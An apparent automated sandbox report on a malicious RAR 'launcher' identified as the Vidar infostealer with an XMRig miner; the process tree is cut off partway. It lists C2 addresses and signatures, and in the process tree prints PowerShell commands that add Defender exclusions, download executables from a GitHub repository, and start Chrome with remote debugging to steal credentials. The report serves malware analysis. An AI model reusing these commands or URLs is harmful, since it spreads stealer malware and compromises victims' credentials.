Analysis

  • max time kernel
    67s
  • max time network
    193s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250410-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/04/2025, 19:00

General

  • Target

    https://download2346.mediafire.com/7y0s9a4nygpg9Hlz64qwpKgpVQD43YfY3SkmgpFTrLOc8YXsvhK9TUfyMneb1cj_CYasLOLoo0COneZnz4cps5AenPk8SUZo-o08fJfaTgHS-krPRg_9KDVnRaGnYpYXWYcDImZTv0r1CmhcbWj4q_uhQTUbZN_xJEach-Ac6iux8A/stl2fcuf5yxabl8/I%D0%B0uncher_v9.1.rar

Malware Config

Extracted

Family

vidar

Version

13.5

Botnet

fe765de57643ac9d227ea7737a97bb87

C2

https://t.me/v00rd

https://steamcommunity.com/profiles/76561199846773220

Attributes
  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Signatures

  • Detect Vidar Stealer 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 9 IoCs
  • Blocklisted process makes network request 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 32 IoCs

    Powershell Invoke Web Request.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 5 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 29 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 24 IoCs
  • Power Settings 1 TTPs 32 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • UPX packed file 14 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Launches sc.exe 50 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://download2346.mediafire.com/7y0s9a4nygpg9Hlz64qwpKgpVQD43YfY3SkmgpFTrLOc8YXsvhK9TUfyMneb1cj_CYasLOLoo0COneZnz4cps5AenPk8SUZo-o08fJfaTgHS-krPRg_9KDVnRaGnYpYXWYcDImZTv0r1CmhcbWj4q_uhQTUbZN_xJEach-Ac6iux8A/stl2fcuf5yxabl8/I%D0%B0uncher_v9.1.rar
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:224
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff86d14dcf8,0x7ff86d14dd04,0x7ff86d14dd10
      2⤵
        PID:4988
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1972,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=1968 /prefetch:2
        2⤵
          PID:2428
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1548,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2232 /prefetch:3
          2⤵
            PID:2256
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2364,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2332 /prefetch:8
            2⤵
              PID:3144
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3224 /prefetch:1
              2⤵
                PID:4104
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3244 /prefetch:1
                2⤵
                  PID:2060
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4380,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4428 /prefetch:2
                  2⤵
                    PID:1008
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4952,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5188 /prefetch:1
                    2⤵
                      PID:1640
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4920,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5064 /prefetch:1
                      2⤵
                        PID:4256
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5516,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3340 /prefetch:8
                        2⤵
                          PID:2560
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3176,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3328 /prefetch:1
                          2⤵
                            PID:1784
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4892,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5072 /prefetch:1
                            2⤵
                              PID:1316
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5812,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4900 /prefetch:1
                              2⤵
                                PID:2104
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4932,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5684 /prefetch:1
                                2⤵
                                  PID:1452
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5960,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6000 /prefetch:1
                                  2⤵
                                    PID:5004
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=6152,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6156 /prefetch:1
                                    2⤵
                                      PID:1640
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=6332,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6320 /prefetch:1
                                      2⤵
                                        PID:912
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=6504,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6520 /prefetch:1
                                        2⤵
                                          PID:4340
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=6780,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5004 /prefetch:1
                                          2⤵
                                            PID:5268
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=6860,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6896 /prefetch:1
                                            2⤵
                                              PID:5368
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=4956,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4912 /prefetch:1
                                              2⤵
                                                PID:5904
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6288,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6548 /prefetch:8
                                                2⤵
                                                  PID:5256
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=208,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4856 /prefetch:8
                                                  2⤵
                                                    PID:5220
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5084,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6344 /prefetch:8
                                                    2⤵
                                                      PID:5208
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6632,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6616 /prefetch:8
                                                      2⤵
                                                        PID:5228
                                                    • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                      "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                      1⤵
                                                        PID:3404
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                        1⤵
                                                          PID:4888
                                                        • C:\Windows\System32\rundll32.exe
                                                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                          1⤵
                                                            PID:5600
                                                          • C:\Program Files\7-Zip\7zFM.exe
                                                            "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Iаuncher_v9.1.rar"
                                                            1⤵
                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:5168
                                                            • C:\Users\Admin\AppData\Local\Temp\7zO034A1978\S0FTWARE.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\7zO034A1978\S0FTWARE.exe"
                                                              2⤵
                                                              • Checks computer location settings
                                                              • Executes dropped EXE
                                                              PID:5544
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\kdbmvxbera', 'C:\Users', 'C:\ProgramData'"
                                                                3⤵
                                                                  PID:1936
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\kdbmvxbera', 'C:\Users', 'C:\ProgramData'"
                                                                    4⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:3004
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\kdbmvxbera\ejthkcxxlz.exe'"
                                                                  3⤵
                                                                    PID:5928
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\kdbmvxbera\ejthkcxxlz.exe'"
                                                                      4⤵
                                                                      • Blocklisted process makes network request
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Downloads MZ/PE file
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:5920
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\kdbmvxbera\lkmqbmmk.exe'"
                                                                    3⤵
                                                                      PID:440
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\kdbmvxbera\lkmqbmmk.exe'"
                                                                        4⤵
                                                                        • Blocklisted process makes network request
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Downloads MZ/PE file
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:1976
                                                                    • C:\Users\Admin\AppData\Local\kdbmvxbera\ejthkcxxlz.exe
                                                                      "C:\Users\Admin\AppData\Local\kdbmvxbera\ejthkcxxlz.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Checks processor information in registry
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:5148
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                        4⤵
                                                                        • Uses browser remote debugging
                                                                        PID:4372
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff86d14dcf8,0x7ff86d14dd04,0x7ff86d14dd10
                                                                          5⤵
                                                                            PID:1044
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                          4⤵
                                                                          • Uses browser remote debugging
                                                                          PID:2600
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff86d14dcf8,0x7ff86d14dd04,0x7ff86d14dd10
                                                                            5⤵
                                                                              PID:628
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1512,i,12501371237643493621,12571396649087439836,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2036 /prefetch:3
                                                                              5⤵
                                                                                PID:5144
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2072,i,12501371237643493621,12571396649087439836,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2068 /prefetch:2
                                                                                5⤵
                                                                                  PID:5800
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2300,i,12501371237643493621,12571396649087439836,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2444 /prefetch:8
                                                                                  5⤵
                                                                                    PID:2268
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3240,i,12501371237643493621,12571396649087439836,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3276 /prefetch:1
                                                                                    5⤵
                                                                                    • Uses browser remote debugging
                                                                                    PID:3920
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3248,i,12501371237643493621,12571396649087439836,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3320 /prefetch:1
                                                                                    5⤵
                                                                                    • Uses browser remote debugging
                                                                                    PID:2348
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,12501371237643493621,12571396649087439836,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4556 /prefetch:1
                                                                                    5⤵
                                                                                    • Uses browser remote debugging
                                                                                    PID:4004
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                  4⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:5976
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff86d14dcf8,0x7ff86d14dd04,0x7ff86d14dd10
                                                                                    5⤵
                                                                                      PID:5988
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1916,i,16985575762878932477,12653668946348461472,262144 --variations-seed-version --mojo-platform-channel-handle=1932 /prefetch:2
                                                                                      5⤵
                                                                                        PID:5476
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1572,i,16985575762878932477,12653668946348461472,262144 --variations-seed-version --mojo-platform-channel-handle=2308 /prefetch:3
                                                                                        5⤵
                                                                                          PID:6004
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2320,i,16985575762878932477,12653668946348461472,262144 --variations-seed-version --mojo-platform-channel-handle=2908 /prefetch:8
                                                                                          5⤵
                                                                                            PID:1844
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3232,i,16985575762878932477,12653668946348461472,262144 --variations-seed-version --mojo-platform-channel-handle=3256 /prefetch:1
                                                                                            5⤵
                                                                                            • Uses browser remote debugging
                                                                                            PID:5492
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,16985575762878932477,12653668946348461472,262144 --variations-seed-version --mojo-platform-channel-handle=3296 /prefetch:1
                                                                                            5⤵
                                                                                            • Uses browser remote debugging
                                                                                            PID:1736
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
